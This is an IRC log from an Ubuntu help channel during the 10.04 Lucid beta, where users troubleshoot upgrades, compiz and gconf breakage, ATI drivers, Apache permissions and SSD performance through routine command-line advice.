
bjsniderwhat is melt?00:00
CarlFKmelt = command line video encoding, uses ffmpeg libs00:00
bjsniderwhere is the ppa?00:01
bjsniderCarlFK, have you got /usr/lib/libavcodec.so.52?00:04
CarlFKbjsnider: yes  /usr/lib/libavcodec.so.52 -> libavcodec.so.52.20.000:05
bjsniderwell, that ppa has no lucid packages, so i'm guessing that's the reason for the error00:06
CarlFKthe segfault is on jaunty.  I am having trouble building on lucid.00:07
CarlFKwell, it builds on lucid, but doesn't run00:07
bjsniderhave you been in contact with the ppa owner?00:08
CarlFKposted to the mlt-dev list, it needs moderator approval, so sent directly to the ppa owner, have not heard back00:09
CarlFKthe error on lucid: [consumer avformat] audio codec libfaac unrecognised - ignoring; [libx264 @ 0xfdf340]broken ffmpeg default settings detected;00:09
bjsnideryou'd need an ffmpeg build with libfaac00:10
bjsniderhis ffmpeg changelog for karmic says "re-enable libfaac support"00:11
CarlFKso it should be enabled in lucid, right?00:11
awci reinstalled windows on my machine after using my live CD to fix the mbr I no longer see the grub screen, all I get is a message stating that i can use the tab key to search for commands and then: grub>         I'm running 10.04, but had to use the 9.04 live CD00:13
redokay so, I have chmodded my home dir (without -R) to 75000:13
bjsniderCarlFK, wrong00:13
rednow other users cannot access it, and thats the way I want it00:13
redbut I have my public_html folder there, and now apache2 tells me i dont have a permission to access it00:13
redhow should I modify priviledges for it to work?00:13
reddrwxrwxrwx  5 red  red       4096 2010-04-17 18:24 public_html00:14
redi tried setting it that way but still nothign00:14
CarlFKbjsnider: ah, missed the "his" - I get it00:14
redor is there even a way to do that?00:15
redthinking I might just create a user called shared and move the folder there perhaps?00:15
CarlFKred: guessing you should ask #apache or #httpd00:16
awcsince my problem is grub related, and not so much ubuntu is there an IRC chan or server that would be better geared towards my problem?00:18
awctowards grub problems**00:18
Ken8521#grub  ?00:19
redhmm, when I plug in my USB Hard drive, it gets automatically mounted for my user name and grp00:34
redand I cannot change them even with sudo00:34
Joeseph64So I was upgrading to Lucid from Karmic, when my mouse (and keyboard) stops responding.  However, my system monitor is still running, so my PC is responding.  It's currently asking a question I cannot respond to.  I think I can still ssh into the computer.  How should I proceed to do the least damage to my system?00:37
penguin42Joeseph64: Try ssh'ing in, it won't do any harm00:39
penguin42Joeseph64: What's the question it's asking and do you know how far it got?00:40
WalzmynJoeseph64: I had mine lock up too. I just rebooted. Had to use the recovery thing and go to terminal and finish upgrading via Apt-get00:42
penguin42If possible it's best to hit reset though at that point, it's probably easier to fix it if you can ssh in00:43
blacksunsevenHaving trouble Giving SFTP users read access to some other directory (more info about my problem here http://ubuntuforums.org/showpost.php?p=9133075&postcount=10)00:43
h00kSo, a Dell Latitude with an ATI Radeon X1250 will not boot, I'm forgetting some useful options I can pass to grub, does anyone else have hints?00:46
Joeseph64I can ssh into it.   It's asking if I want to keep a configuration file or use the new one....  What should I do after I'm sshed into it?00:46
matumbaXID collision, trouble ahead - man i must be lucky... over 18,000 collisions and still no trouble :D00:47
WalzmynJoeseph64: which configuration file?00:47
penguin42h00k: Try radeon.modeset=000:49
h00kpenguin42: yeah, that might have been it.  Also, an issue with dbus was happening...I think, where it wouldn't run GDM, but let me try something.00:50
penguin42h00k: Sorry, not got the dbus hints00:51
h00kpenguin42: alright00:51
penguin42h00k: If it didn't boot how did you get the dbus errors?00:52
h00kpenguin42: standby, let me try something to better explain it00:53
h00kpenguin42: so, on the liveUSB, would that go after the -- in the boot line?00:58
h00kpenguin42: alright, giving that a shot00:59
h00kpenguin42: you got it, thank you. I'll have to add that to the grub config when I'm finished, yes?01:00
penguin42h00k: OK - can you add a comment to this bug please with details of your machine/card: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/56030601:01
ubottuLaunchpad bug 560306 in linux "[lucid] ATI hd5xxx cards wrongly doing kms?" [Undecided,Confirmed]01:01
h00kpenguin42: yes, will do.  Thank you.01:01
h00kpenguin42: I'm pretty sure I talked to you about this before, too :)01:02
penguin42you did? Heck I can never remember these things01:03
h00kpenguin42: I don't know. perhaps01:03
Joeseph64Sorry for the extremely long delay... The config file is /etc/grub.d/debian_theme or something like that.  I can ssh in.  How should I proceed?01:04
Joeseph64Walzmyn: Meant to put your name at the end....01:04
penguin42Joeseph64: find out what is still running, try and kill off the thing giving you the prompt, and then each process in the update - try not to use kill -901:05
penguin42Joeseph64: If you;re lucky you'll get to the point where you can do from the ssh an apt-get update && apt-get dist-upgrade to finish the upgrade off01:05
WalzmynJoeseph64: emm, not sure what that one is. But default is to keep the one you have, usually.01:05
Joeseph64penguin42, Walzmyn: Alright.  So I should px -ax and kill off the things that sound like they're from the upgrade prompt?01:06
penguin42Joeseph64: That's what I'd do - but try and go gently - you want it to fail as neatly as possible01:07
Joeseph64penguin42: Do you just happen to know the  names of the process that would be running the upgrade?01:08
penguin42not the bit that does that bit01:08
penguin42pstree might help01:09
myk_robinsonrunning beta 2 with all updates. When I plug headphones into my laptop, it does not disable the speaker output. Any ideas?01:13
Joeseph64penguin42: Currently running apt-get dist-upgrade...  Hope It's working right....  I backed up all my important files before I upgraded, so I should be okay01:14
reddoes crontab reset on apt-get safe-upgrade?01:18
Joeseph64 Well I feel like an idiot....I just updated my system that I'm on instead of the one I was going to ssh into......01:32
LetsGo67My laptop keeps overheating and it is frustrating me.  Can someone help please?01:46
Ken8521get a cooling pad?01:52
Dantonichi, how unstable is the current 10.04 beta02:15
DantonicAny broken functionality?02:15
JEEBsvDantonic: depends on your hardware etc. it seems. Only and only install it if you're not afraid of losing some data in the process (backup well frequently, have another way of booting the PC at all times and all those shenanigans :P) (It works fine for me on my eeepc now).02:18
DantonicI see thank you.  I'm mainly concerned with functionality issues/ bugs... I might give it a shot.02:19
aimI'm not sure if this is Lucid related or not, but... When I go places>Downloads, I get the error "Could not open location 'file:///home/hamish/Downloads' - No application is registered as handling this file" Cans omeone help?02:22
SwedeMikedo you have a directory named Downloads in your home directory?02:22
aimit does it with all the directories in 'places'02:23
aimThe 'Computer' location and 'Network' location works, but nothing that uses the notation "file:///"02:24
SwedeMikeoki, no idea, but that it does it for all the dirs is good information.02:24
aimI think it's something to do with 'No application is registered as handling this file'02:25
DanaGhmm, go in nautilus to somewhere, and right-click -- "properties".02:25
DanaGthere should be an "open with" tab.02:25
aimBasically, how do I assign nautilus to open 'file:///'s02:25
DanaGSet it to open with "open folder".02:25
DanaGRight-click on a folder, that is.02:26
aimthere is no 'open with' tab...02:26
aimThe tabs are 'Basic, Emblems, Permissions, Notes, Share'02:27
coc0nutDon't go to properties02:28
Volkodavanybody runs SSD ?02:28
coc0nutwhen you right click it, go to "Open with other Application..."02:28
aimcoc0nut, then where?02:28
aimoh ok.02:28
coc0nutTired, so I'm typing slowly ;;02:29
SwedeMikeVolkodav: there are lots of people using SSDs.02:29
VolkodavI wonder do they need any special tweaks for FS ?02:29
aimcoc0nut, huh... that was such a simple solution, thank you very much! :))02:29
aimcoc0nut, you've made me quite happy haha, cheers, that's been bugging me for some time now :P02:29
SwedeMikeVolkodav: depends on the ssd, some will benefit from aligning the fs with the internal cell size and telling the fs about it.02:30
Volkodavbenefit in terms of ?02:30
Volkodavlifespan ?02:31
MTughanSpeed, latency, lifespan, could be any combination of those.02:31
SwedeMikeit all depends on the internals of the ssd02:31
SwedeMikeall ssd:s are not alike02:32
Volkodavlike this ? http://www.newegg.com/Product/Product.aspx?Item=N82E1682013911202:32
Volkodavdoes hdparm works with them ?02:34
SwedeMikeI recommend the intel x25 series02:34
SwedeMikeVolkodav: what do you want to do with hdparm with an hssd?02:34
Volkodavit's write speeds are not that great02:35
SwedeMikein real life, the x25 is better, linear write speed isn't usually that important.02:35
Volkodavreadahead and such02:35
MTughanI've been happy with my Kingston V+ series SSD over a traditional HDD.02:35
Volkodavnot linear - sequential02:35
SwedeMikean ssd doesn't do readahead, the OS might, but the ssd doesnt02:35
SwedeMikeVolkodav: what's the difference between linear and sequencial?02:36
jakexksHave SSDs got a decent mttf now?02:36
MTughanjakexks: You mean MTBF?02:36
MTughanMean Time Between Failures02:36
MTughan(don't ask why they use between)02:37
jakexksyes, that02:37
jakexksanyway, will they last as long as a typical hard disk drive?02:37
MTughanjakexks: Depends on how much writing you do.02:37
SwedeMikessd:s aredifferent beasts from hdd:s, different failure modes. Read the articles and the specs and see if it's a problem for you. Intel claims you can write to it 24/7/365 and it's not a problem.02:37
MTughanAs I understand it, it's the write operations that break down the flash after a while.02:38
SwedeMikesome drives expect you do not write more than a certain amount of data per day in order to keep the mtbf.02:39
SwedeMikeI've switched to SSDs for system drives in all my systems, windows and linux. I have ocz vertex and intel x25 drives, I prefer x25 all times of the day.02:40
VolkodavI looked at these - they are reported to be the fastest02:42
xiambaxI just dist upgraded to 10.04 and fglrx failed to install.02:42
xiambaxHow can i fix this?02:42
Volkodavwaiting for the quote from them02:42
SwedeMikeask about combined read/write performance, I know drives that read great, write great, but when you mix reading and writing performance goes down to below hdd levels.02:44
SwedeMikeocz solid is one of those drives, a cf card is the same02:44
VolkodavI will02:44
DanaGThe best place to go for SSD hardware reviews: anandtech.com02:45
Volkodav Timing buffered disk reads:  356 MB in  3.00 seconds = 118.47 MB/sec02:50
VolkodavThat's a 10 k WD02:50
VolkodavSwedeMike what's your output on Intel ?hdparm -t /dev/sdX ?02:50
xiambaxI see a bunch of intel SSD in all the macbooks i work in02:55
Volkodavintel CPU + Intel ssd02:57
Ken8521i think ssd's are over-rated02:57
VolkodavI will see when it arrives02:58
xiambaxfor the price and performance im not sold on them yet02:58
xiambaxIf my harddrive failes i can run data rescue shit on it02:58
xiambaxif my SSD fails.02:58
xiambaxIm up #$@# creek02:58
Volkodavhave to run my tests02:58
VolkodavI will OS on it only02:59
xiambaxYeah Im considering doing that too02:59
xiambaxSSD for OS02:59
Volkodavall others for storage02:59
xiambaxand Raid 1 for my data /home02:59
xiambaxI get my Macbook i5 next week02:59
xiambaxIm pretty stoked02:59
xiambaxDisappointed they didnt go quad core though03:00
VolkodavI have previous version03:00
Volkodavno reaSON for dissapointment03:00
xiambaxWell quadcore would be nicer03:00
Volkodavkernels don't know what to do with 4 cores anyway03:00
xiambaxunless they just turned off two cores until an update is released03:00
xiambaxwell id run macosx on it :D03:00
xiambaxput 8 gigs of ram03:01
Volkodavsome dual cores outperform quads03:01
xiambaxand then visualize03:01
xiambaxTrue i guess03:01
Volkodavit you look at the usage core 3 and 4 are hardly used03:01
xiambaxbut a 27 inch i7 would out perform the i7 macbook03:01
xiambaxhands down03:01
xiambaxOn another note.03:02
xiambaxIm very happy the ubuntu community ditched the brown colour scheme03:03
haz3lnutcompiz broken anybody?03:06
haz3lnutcompiz and metacity fail to start.  no title bar on windows. have to manually start metacity.  compiz craps everything.03:08
haz3lnutthis is all in beta 203:08
haz3lnutsad thing is, I booted beta 1 from live cd and had no issues whatsoever!  So I said cool, I'll upgrade from the alternate cd to beta 2.  Ack!03:09
TommyThaGunis there a way to set up a certain app to ignore the Show Desktop button?03:09
haz3lnutso everyone else here running lucid without issues then?03:11
haz3lnutwill step away for a minute, get a glass of wine, maybe have some response when I get back...03:11
TommyThaGunsorry haz3lnut, it seems to be working for me, but I'm not using a lot of compiz settings either03:13
TommyThaGunjust some "basic" stuff03:13
TommyThaGunI don't even think cube is enabled03:13
haz3lnutissue is, metacity won't load on boot, so there is no title bar.  I have to manually type metacity --reload in terminal to start it up.  I try to enable effects but it makes invisible titlebar.  this is with default theme, and nvidia driver.03:15
Ken8521hmm haz3lnut.. everything has worked fine for me... actually, it was a seamless transition on my laptop, w/ only samba causing a minor issue on my desktop03:16
haz3lnutI ran lucid in a vm for two weeks and it seemed rock stable.  Then I booted from the live cd and tested the nvidia driver an compiz, that all worked just fine. So then I decided it would be safe to upgrade my karmic to lucid from the alternate cd.  Now I have this issue.03:18
Ken8521hmm, i did clean installs, didn't upgrade.03:18
haz3lnutevery time I do a clean install, it's weeks before I'm back to normal.03:19
haz3lnuthas anyone else here done the "upgrade"?03:19
TommyThaGunis there a way to set up a certain app to ignore the Show Desktop button?03:22
haz3lnutTommyThaGun: what do you mean?03:23
haz3lnutThat it won't hide when you click the show desktop?03:24
chris4585I think he means have an app always on the desktop03:24
haz3lnutprobably better asked in the gnome channels03:25
TommyThaGunlike Screenlets03:25
chris4585I checked and no, the option for Always on Desktop does not ignore show desktop03:26
TommyThaGunI like Screenlets, but I want for them to be sticky on my desktop... you would think they would have that option03:26
PeloTommyThaGun, probably not wiith a desktop app, but if you tell us what the app is there might be a screenlet or a conky script that can do the same job03:26
TommyThaGunPelo, specifically Screenlet03:27
haz3lnutTommyThaGun, the show desktop option is a gnome feature to clear everything.  if apps are allowed to ignore that, than what good would it be?03:27
TommyThaGunright, but maybe there is something that I want to consider as part of my desktop03:27
PeloTommyThaGun, got a specific app in mind ?03:28
haz3lnuthmmm, a desktop icon then?03:28
chris4585Pelo, he said screenlets03:28
Pelochris4585, he meant that behaved like a screenlet03:28
TommyThaGunthe weather applet in Screenlets is one03:28
chris4585he did say specifically screenlets03:29
haz3lnutI got that.03:29
TommyThaGunno, I mean the program Screenlets03:29
bjsniderhaz3lnut, try creating a new user account, call it test or something. log in to it and check if compiz is screwed up there03:29
Peloscreenlets do not get cleared when you use show desktop03:29
TommyThaGunthey do for me03:29
haz3lnutthanks <bjsnider>, I'll try that.03:29
PeloTommyThaGun, there is probably an option that needs to be tweaked in the screenlets manager itself then03:30
TommyThaGunI've looked everywhere for that option03:30
blacksunsevenHaving trouble Giving SFTP users read access to some other directory (more info about my problem here http://ubuntuforums.org/showpost.php?p=9133075&postcount=10)03:31
PeloTommyThaGun, let me install and have a look03:31
chris4585TommyThaGun, this might help http://www.screenlets.org/index.php/FAQ#Why_do_my_screenlets_disappear_when_I_show_the_desktop.3F03:31
TommyThaGunI think I just found that exact page chris458503:32
TommyThaGunthank you03:32
chris4585hope it resolves your issue03:32
TommyThaGunthank Pelo, I think this page may help me out, let me look at it and see where it leads me03:32
haz3lnutbjsnider, that worked in the alternate user account.  So then, you got any possible solutions why it doesn't work in mine?03:33
bjsniderhaz3lnut, obviously it's a gconf problem03:34
haz3lnutAnd it's also a bug, because it worked beautifully in karmic and a simple upgrade broke compiz and metacity fallback upon lucid upgrade.03:35
bjsniderone possible solution is to remove your ~.gconf and ~.gconfd directories and log out/log in.03:36
TohuwIt used to be there was a button in nautilus for manually typing a location in. Where did that go?03:36
bjsniderrename them and then new ones will be created03:36
bjsniderhaz3lnut, it's not a bug, no03:36
haz3lnutsure seems buggy.03:37
bjsnideryour userland files contain some kind of deprecated information03:37
haz3lnutand it's bugging me.03:37
Tohuwhaz3lnut: a bug that doesn't happen to other people is not a "bug".03:38
haz3lnutbut I'm an expert user.  What if my dad upgrades and his system falls apart?  He'll call me squeeling about how he wants to go back to windows!03:38
Tohuwthat doesn't change the fact that this doesn't happen to other people, even you under a different user.03:39
bjsniderhaz3lnut, you're an expert user?03:39
haz3lnutbjsnider, did you install fresh or upgrade from karmic?03:39
Tohuwbjsnider: probably should sidestep that point.03:39
bjsniderhaz3lnut, that's a complex issue. i installed into a freshly partitioned root, but /home was already there for years03:40
haz3lnutI'm a 20 year computer user on mulitple platforms and 4 years steady on linux.03:40
haz3lnutbjsnider, isn't you .gconf in /home/...03:40
bjsniderit is03:41
Tohuwhaz3lnut: this is not a place where you build street cred. For every ounce of experience you have, someone here can "outdo" you. It's a place for support, not egowaving.03:41
bjsniderhaz3lnut, the difference between me and you is that you'd still have some leftover karmic packages where i don't03:41
haz3lnutTofu, uh Tohuw... he asked.03:41
haz3lnutyou mean a bug.03:42
Tohuwhaz3lnut: and I suggested he sidestep that discussion for a reason, regardless, this line of conversation is exhausted.03:42
haz3lnutbecause the upgrade is supposed to remove the old, deprecated packages and install new ones.  I'm not complaining, I'm stating a fact.03:43
Tohuwhaz3lnut: no, because on a test system that upgraded from karmic to lucid, that bug did not happen to me.03:43
TohuwSo "something else" happened03:43
bjsniderhaz3lnut, no, if the karmic package is not deliberately forced out by another package, whether through a conflict or a deprecation, it is left in03:43
haz3lnutTohuw, sorry to wear you out, but I'm trying to solve a problem.03:44
bjsniderbut that's not your problem in this case, it is broken userland files03:44
haz3lnutBugs don't happen to everyone.  Bugs happen to some people.03:45
bjsniderthis is definitely not a bug03:45
Tohuwhaz3lnut: trying to solve a problem never wears me out. Ego exertion does. QED. Anyway, to steer back to the topic, your userland files clearly have a problem, like bjsnider said. So, you can: a) remove your ~/.gconf directory or b) analyze the contents of the settings files to narrow down the conflict. Everything about your problem pegs it to a broken configuration somewhere. Before you can usefully report a bug on it, the actual issue 03:46
haz3lnutbjsnider, I got that.  And I'll fix it in a moment, I'm just saying that if it happened to me, it can likely happen to many, MANY others.  and they might not be so easy to find a solution, they might spit on ubuntu and go back to windows.03:46
bjsniderhaz3lnut, this kind of thing happens all the time03:47
Ken8521man, my internal mic finally works in ubuntu, but the volume is horribly muffled03:47
bjsniderit's specifically because th package manager is not supposed to touch userland files03:47
Ken8521but if i listen carefully, i can hear myself.03:47
TohuwKen8521: too quiet or too distorted?03:48
haz3lnutTohuw, bjsnider, I know it happens all the time, and it's a bug in the upgrade process and should be addressed.  I'll fix my system and BRB03:48
Tohuwhaz3lnut: again, you upgraded to a BETA of Ubuntu. This means strange things can happen. If you believe you have discovered a genuine bug, you'll need to find what actually caused it by taking a look at the userland files.03:48
stalis my radeon hd3600 preconfigured in 10.04 b2?03:48
Tohuwstal: define "preconfigured"03:48
bjsnideruserland files are off the table. we can't touch them during an upgrade03:49
stali.e. do I need to do anything to get it working03:49
Ken8521Tohuw, to quiet.03:49
Ken8521i can hear my voice, its just way way to quiet.03:49
Ken8521adjusted some volumes, etc.. got it a "little" louder, but not much03:49
Ken8521was hoping to use skype w/o an external mic03:49
TommyThaGuntreat as widgit03:52
TommyThaGun+ widgit layer03:52
TommyThaGunvery interesting03:52
TohuwKen8521: model of laptop or monitor with internal mic?03:52
amniteany1 have any info on changing the boot and login screen on lucid beta 2?03:53
Tohuwstal: aside from installing the proprietary driver (which will be automatically upgraded if you're coming from an older version) probably not03:53
Tohuwamnite: what do you want to change?03:53
amnitebackground, images and just the way the login style looks03:54
haz3lnutFixed it.03:54
Tohuwamnite: http://www.ubuntumini.com/2009/09/hack-karmics-gdm-login-screen.html will work for you03:55
Ken8521Tohuw, it an acer 5315-2153 and lspci shows..  00:1b.0 Audio device: Intel Corporation 82801H (ICH8 Family) HD Audio Controller (rev 03)03:56
haz3lnutAlthough, metacity failed to load as fallback, I was able to load compiz effects...actually, I didn't reboot after that to see if compiz loaded by default.03:56
staliI hate the fglrx driver03:56
Ken8521strange thing is.. if I do something that is really "loud"  like yell, or cough really hard, it plays the sound back at perfect volume(test call)03:56
stalhow do I know if a display driver is in use?03:56
haz3lnutThanks, bjsnider, for your help and input. No thanks to Tohuw for his pias, derogatory comments.03:58
TohuwKen8521: <3 for anticipating the possible need to see your lspci. To answer your question, take a look at https://help.ubuntu.com/community/HdaIntelSoundHowto and see if the suggestions there for fixing the mic work.03:58
Tohuwhaz3lnut: "pious" and I didn't degrade anyone. Try to be easier to work with and back the ego off a little, and your future support experiences will doubtless go better. :)03:59
Ken8521i can pastebin my whole lspci for you, but i'll take a look at that.. http://pastebin.com/J9WeC8iG04:00
Tohuwstal: lspci | grep -i vga04:00
Tohuwstal: sorry, didn't read your question properly!04:01
Tohuwtry looking through your xorg logs04:01
stali'll post the outout anyway04:01
stal01:00.0 VGA compatible controller: ATI Technologies Inc Mobility Radeon HD 3600 Series04:01
Tohuwthat will just tell oyu your video card04:01
Ken8521Tohuw, i wonder how much of that is relevant to Lucid.. i don't wanna screw up what has been a fairly stable syhstem.04:01
TohuwKen8521: backup the associated files and try it?04:02
haz3lnutSorry tohuw meant to say pissass, but pious works too :-)  No, just kidding.  Look everyone has an ego. The "expert" claim that you took offense to, was in context of thinking about other lesser experienced people who may not be able to tolerate a broken system on a simple upgrade.  That's all.04:02
stalwhere are my xorg logs anyway?04:02
Ken8521i guess i could.04:02
Tohuwyou are likely using fglrx if it's installed, but check /var/log for your xorg logs and see what they say. Xorg.0.log is probably one of them, but it makes several according to a configurable logging policy04:03
TohuwYou can also use Gnome's log viewer under System --> Administration04:04
Tohuwbut it's good to know where things are :)04:04
stal(II) LoadModule: "radeon"04:04
stalbut soon after...04:04
stal(II) LoadModule: "vesa"04:04
TohuwSpeaking of where things are, how do you temporarily bypass the location bar buttons and straight type in a location? There used to be a little button for that04:04
Tohuwstal: that's just modules being loaded; not what you're after04:05
TohuwYou can also just check jockey and see if fglrx is set as "Active" (System --> Administration --> Hardware Drivers)04:05
TohuwFor the record, unless you've done something odd, you're using radeon or fglrx. If compiz is working, you're definitely using fglrx04:06
Tohuw(nearly definitely)04:06
stalfglrx isn't activated04:06
stalbecause it sucks04:06
Tohuwfair enough :)04:06
stalbut i hear vesa can only do certain resolutions?04:07
bjsniderstal, ok, fglrx sucks. granted. which ati graphics driver for this platform _doesn"t_ suck?04:08
TohuwYes, if you're using a resolution over 800x600, you're likely using radeon04:08
Tohuws/this platform/any platform04:08
bjsniderthey all have tremendous sucking potential04:08
xiambaxHas anyone seen the new songbird?04:09
stalalright, so i'm using radeon04:09
haz3lnutstal, fglrx used to work for me until 9.04.  Then I did a complete system upgrade and switched to nvidia card.  maybe still not fully supported, but better IMO.04:09
xiambaxrunning on 10.04?04:09
xiambaxIt blends really nice04:09
stali had fglrx running smoothly on my 32bit install about 3 hours ago04:09
bjsnider"fglrx used to work for me" -- words never before uttered by man.04:10
xiambaxI cant get fglrx running on AMD64 either04:10
stalthough i wasted a week getting it up04:10
xiambaxI wonder how linux is going to play nice with my new macbook pro which switches audio04:10
stalon to my next question04:10
xiambaxi mean video04:10
xiambaxis probably OS integrated so i can just choose which videocard to use04:10
stalmy window decorations are flashing as i resize04:11
DanaGxiambax: probably depends whether you boot in UEFI boot mode, or through Boot Camp (bios-emulation).04:11
DanaGUEFI boot mode means you use grub-efi.04:11
Tohuwstal: FWIW, flgrx was a complete wreck for me until about a week ago, when patches were released.04:11
xiambaxDanaG, Has anyone had any experience with one yet?04:12
* Tohuw waves to DanaG04:12
bjsniderTohuw, now it's only 95% a wreck04:12
Tohuwbjsnider: sounds like a bargain to me04:12
DanaGI wish that damn "don't do stupid readback from video RAM" patch would go into upstream xorg.04:12
stalTohuw: the way I got mine to work was by getting the driver from amd.com04:13
DanaG1D: memblock.c: Pool full04:15
TohuwDanaG1: "that shouldn't happen"04:20
SwedeMikeVolkodav: I get 155 MB/sec with hdparm -t on my x25-m 80gig drive04:20
SwedeMikeVolkodav: but as I said before, it's the random access speed that is the interesting point, not sequencial ones.04:21
SwedeMikeI dont use ssd:s for bulk storage, I use it for random read and writes, and the x25 drives excel at that04:21
DanaG1ugh, it's being all crackly-sputtery.04:23
VolkodavI am planning for OS only04:24
DanaG1hmm, have you compared the Intel ones to the OCZ ones?04:24
Volkodavand maybe some storage that needs fast access like HD video04:24
DanaG1I've seen benchmarks that show the OCZ ones using less power than the Intel ones.04:24
SwedeMikeDanaG1: yes, I have both ocz vertex and x25 drives, and I'm not buying more vertex drives, they're worse as system drives in my experience.04:24
DanaG1hmm.  How so?04:25
=== DanaG1 is now known as DanaG
SwedeMikethey just are.04:25
SwedeMikeI dont have any figures.04:25
DanaGBut I mean, programs load less quickly, or such?04:25
SwedeMikemost likely a read/write random IOPS figure tha tis worse.04:25
SwedeMikeas soon as they go under random read/write load they perform worse.04:25
DanaGToo bad ALL ssds are godawful expensive.04:27
SwedeMikethe ocz vertex drives aren't bad, but considering the price etc, I'm just buying x25 drives in the future until something significantly better comes along. the x25 drives are workhorses, they fperform consistently.04:27
DanaGpower usage benchmark.04:28
DanaGIntel one uses more power than my HDD claims to use.04:30
SwedeMiketoo bad they dont mix read and writes04:30
SwedeMikeas you ca nsee the sandforce controller needs alignment etc to perform well, the intel drive always performs well.04:31
SwedeMikeand that is why I recommend it, for a plug and play drive that performs well all the time (perhaps not stellar), choose the x2504:32
SwedeMikein a few months when the sandforce drives are out in volume and all the bugs are worked out, they might be a better buy, I don't know.04:33
Volkodavdoes capacity improve anything ?04:36
SwedeMikeVolkodav: please elaborate.04:36
Volkodavwell similar drives of 64 and 512 capacity04:38
SwedeMikeI understood the word capacity.04:38
Volkodavwill 512 be faster or better on any gived benchmark ?04:39
SwedeMikeVolkodav: a little, yes. the 160 gig x25 drives perform slightly better in tests04:41
VolkodavSo it is not different from regular drives04:42
SwedeMikedepends on the design.04:42
SwedeMikethe x25 drives are capped at 80 megs/s write perofrmance to avoid stalls, that's why it's so consistent.04:43
Volkodavreason I went with Kingston they use Toshiba controllers who actually invented NANd flash04:43
haz3lnutbjsnider, I rebooted and compiz does not load again on startup.  I had to manually turn on System/Appearance/Visual Effects to get a titlebar.  This was after having removed .gconf and  .gconfd for them to be rebuilt.  the only difference now is that i can enable visual effects whereas before I could not.04:43
haz3lnutAny ideas?04:44
Volkodavthey have the experience to not only make the controller, but also the flash that runs seamlessly with it04:44
Volkodavwill see how it performs04:44
stalhaz3lnut: check your window decorations plugin in ccsm04:48
stalmake sure it isn't blank04:48
haz3lnutstal, Enable Window Decorations is checked.  is that what you mean?04:50
DanaGArgh, I  hate how evince skips to the next page, even when windowed, when I try to skip tracks in my music player.04:50
DanaGI can understand doing that if evince is fullscreen... but not if it's windowed!04:50
stalhaz3lnut: nope, click into it and check the Command field04:50
DanaGAnd it GOES fullscreen when you try to play/pause music!04:51
DanaGI'd like to make a sheet of paper jump into the face of whoever decided to make that feature... any time he tries to play or pause music.04:51
DanaGNo, how about a whole book?04:52
DanaGAnd then make it turn pages when he skips tracks.04:52
haz3lnutstal, command field says "/usr/bin/compiz-decorator"04:54
haz3lnutbut that's not really the issue.  compiz works, but only if I enable it after boot.04:54
haz3lnutwindow manager is not auto starting.04:55
stalhaz3lnut: oh04:55
stalwait a sec04:55
stalhaz3lnut: alt-f2 and type gconf-editor04:55
stalnow open /desktop/gnome/applications/window_manager in gconf-editor04:57
haz3lnutall read <no value>  hmmm04:57
stalboth "current" and "default" should be /usr/bin/compiz04:57
dartdogbeen trying to install 10.04 all day and now part of night.. Seems that I may have put too large of a (new) disk in my older Gateway Laptop I get the system running then go to update using the system update and I cannot restart after  and it just hangs,,, no error04:58
stalso put those in04:58
haz3lnutthey are set as integer fields, guess I should change to string.04:58
stalhaz3lnut: yep04:59
haz3lnutquestion is, why did that get whacked?04:59
stalhaz3lnut: you mentioned something about deleting your gconfs05:00
stalthere's your cause05:00
haz3lnutstal, yep, because it was whacked.  no compiz or metcity loading on startup.05:00
haz3lnutI need to restart to check if it's fixed.05:01
Babalabons0 what is all the hype about ubuntu 10.4 lts, "change is coming" whats gonna be so good about it?05:04
stalBabalabon: light-themes05:05
DanaGoh yeah, I much prefer the old byobu ubuntu-logo thingy over the new one.05:05
DanaGold: \o/  (yay!)05:05
DanaGnew: _U_05:05
DanaGunderscores represent spaces.05:06
darthanubisBabalabon, http://www.ubuntu.com/testing/lucid/beta205:06
haz3lnutstal, still multiple attempts at variations.  no window manager on startup.05:13
stalhaz3lnut: i don't know what to say05:14
rippsHmm... I wonder what's causing my swap partition to slowly fill up. Is there someway I can track if a memory leak is causing it?05:24
Dr_WillisHmm. Somehow I managed to get KDM on alt-ctrl-f1 and the Lubuntu LXDM on alt-ctrl-f705:25
Dr_Willismemo to self - dont try installing lubuntu-desktop alongside gnome/kde any more. ;)05:26
Dr_WillisYep lxde desktop.05:29
Dr_WillisNice in some ways.. but how it fits in if you have gnome/kde also installed.. is a BIG bunch of annoyances05:30
xiambaxOh. It looks like  xubuntu05:32
Dr_Willisactually its using lxde not xfce05:32
xiambaxI just use fluxbox if system resources are low05:32
Dr_Willisits using openbox + a few extra tools05:32
xiambaxbut all my systems have atleast 2.0 ghz and two gigs of ram05:32
xiambaxSo im like meh05:32
Dr_WillisYep. I was trying it on my netbook.05:33
xiambaxNetboot remix?05:33
Dr_Willissince it has a netbook-edition also.. wich as far as i could tell.. dosent work very well.05:33
xiambaxI installed netboot remix on a hdtv the other day05:33
xiambaxit worked awesome05:33
Dr_Willisthe UNR works very well on my AAO.05:33
Dr_WillisKDE's netbook interface is also very nice in ways.05:34
xiambaxnever seen it05:34
xiambaxI havent touched kde since redhat 6?05:35
Dr_Williskde 4.4 has some very nice features05:35
xiambaxoh my05:35
xiambaxredhat 6 came out in 199905:35
xiambaxim so old!05:36
Dr_WillisI recall useing that.05:36
Dr_WillisI used to irc on 'green bar printing' terminals :)05:36
xiambaxIm only 23 though05:36
ddecatorpft, that's not old05:37
xiambaxOld ballz old05:37
xiambaxIt is when i recall spending the past 11 years in front of a computer05:37
Dr_WillisI got computers older then 2305:38
xiambaxHaha. Yeah. I have computers older then me aswell05:38
xiambaxmy woz edition apple 2ci05:39
xiambaxand my old XT05:39
droidalright, anyone else not able to graB headers correctly when doing apt-get update?05:39
shapeshiftahello guys, I am wondering if anyone has a hauppauge hvr 2250 working with mythtv, me-tv, totem, etc.?05:40
ddecatorthat's pretty specific, haha05:41
xiambaxYeah. Works for me05:41
shapeshiftaddecator: well mythv picked up the card05:41
xiambaxcant get glx to take though05:41
=== droid is now known as gartral
shapeshiftabut me-tv doesnt see it, and totem  i can't quite figure out05:42
Dr_Willisi have to wonder if its an issue of the card not seen.working,, or a  'tv tuner apps/tools are  a pain to figure out'  issue.05:42
Dr_WillisTook me a while ages ago to get my first tv card working in Mythbuntu05:43
Dr_WillisMythtv setup dident select somthing properly by default in one of the settings05:43
shapeshiftaDr_Willis: it working, i don't know why me-tv doesnt see it05:43
Dr_Willisthe #mythbuntu guys are proberly the experts on the tv cards. I dont even have cable any more. :) so no tv card for me.05:43
shapeshiftai just want to test out me-tv and totem05:43
Dr_WillisI dident een relize totem could do tv tuner cards05:44
